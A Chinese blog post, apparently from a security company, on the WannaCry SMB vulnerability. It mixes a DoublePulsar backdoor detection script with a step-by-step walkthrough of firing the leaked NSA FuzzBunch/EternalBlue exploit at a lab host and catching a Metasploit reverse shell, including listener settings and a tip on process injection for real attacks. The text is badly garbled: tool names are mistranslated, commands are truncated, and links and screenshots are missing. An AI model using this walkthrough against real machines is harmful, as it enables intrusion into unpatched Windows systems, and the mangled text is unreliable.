NSA永恒之蓝工具来检测下的SMB漏洞复现

截至目前，全球近100个国家的10万多个组织和机构遭到入侵，其中美国组织1600个，俄罗斯组织11200个。 中国29,372个组织组织的数十万台机器被感染，并向受害者勒索赎金。 受感染组织机构几乎覆盖所有地区，影响高校、火车站、自助终端、邮局、加油站、医院、政务服务终端等多个领域。 受感染计算机的数量仍在增长。

下面， 重现了该漏洞。

脚本链接：

上述两个脚本检查目标主机是否被黑客利用SMB和RDP漏洞攻击并留下后门。

SMB 漏洞后门可用 - 删除此后门的选项

可以通过以下方法检测是否存在SMB后门：

root@kali:~# smb.py --ip 192.168.175.128

[-] [192.168.175.128] SMB 数量

root@kali:~# smb.py --ip 192.168.175.128

[+] [192.168.175.128] 中小企业！！！

如果存在，可以使用 -- 选项将其删除

root@kali:~# smb.py --ip 192.168.175.136 --

[+] [192.168.175.136] 中小企业！！！ 异或键：

[+] [192.168.175.136]

以下脚本基于smb.py的功能，改为批量扫描目录下的IP文件列表的形式。

Usage:
python detect_doublepulsar_smb_T.py ipFilePath
ipFilePath 是当前脚本目录下的待测IP文件列表目录，待测IP列表文件名以下划线 _ 来分割左右两边，右边为唯一序号，
如 ip_1.txt,文件中放的是单个ip,一行一个。
脚本遍历目录下的所有文件中的ip对SMB漏洞进行后门检测，并把有后门的ip保存在文件中。
脚本默认打开50个线程，大家可以在脚本里自行设置

脚本链接：

参考链接：

该勒索软件利用了445端口的SMB漏洞。您可以使用该脚本来检测您的机器是否留有后门。 如果没有检测到，可以使用下面的NSA Blue工具来检测。 。

脚本链接：

检测方法

切换到win 7攻击机cmd中的目录，输入：fb.py

创建攻击项目日志目录文件夹，并设置攻击目标192.168.102.137的攻击日志目录

然后输入：user并回车，直至需要选择对应的攻击系统，如下图：

方案一采用常规部署方式（即在目标机上建立后门的部署方式，带有模糊测试）

然后一路回车确认攻击目标信息。 然后使用use并回车，直到需要选择要攻击的服务类型，如下图：

我们攻击的服务类型是SMB，所以输入0，但如果下次攻击涉及远程登录，即RDP，则输入1，然后选择攻击系统的版本：

这里我们输入目标机器对应的系统版本，输入1。

然后，您需要选择要执行的操作：

这里我们输入2来执行kali linux 2 msf生成的反弹shell的dll后门（放置在C盘根目录下）：

回到win 7攻击机，设置反弹shell对应的dll文件()路径。

然后在Kali linux 2上运行：

#

msf > 使用/multi/

msf > 设置 LHOST 168.0.104

无国界医生 > 设置 LPORT 8089

msf > 设置 //

无国界医生>

上图显示msf正在监听本地端口（查看是否有反弹shell返回，并控制反弹shell会话）。

返回到WIN。 输入反弹shell的路径后，需要输入需要注入反弹shell的进程和命令行进程。 由于已经有了默认设置，我们直接回车即可（当然，在真正的攻击中，最好是注入到其他进程中）

按回车后发现在攻击机器上已经成功执行，并且shell被弹到了Kali机器上：

看到已经成功利用（即获取winxp目标机的cmd会话权限）：

成功控制无人机（可以以管理员权限控制机器）：

结尾

深圳市极进网络技术有限公司专注于系统底层及网络攻防技术的研究。 是一家将网络安全与大数据人工智能应用相结合的信息安全运营服务商。 自成立以来，已为我国关键信息基础设施、政府部门、大型企业提供服务。 为大中型企事业单位及重点行业提供全方位的网络安全解决方案和专业的安全服务。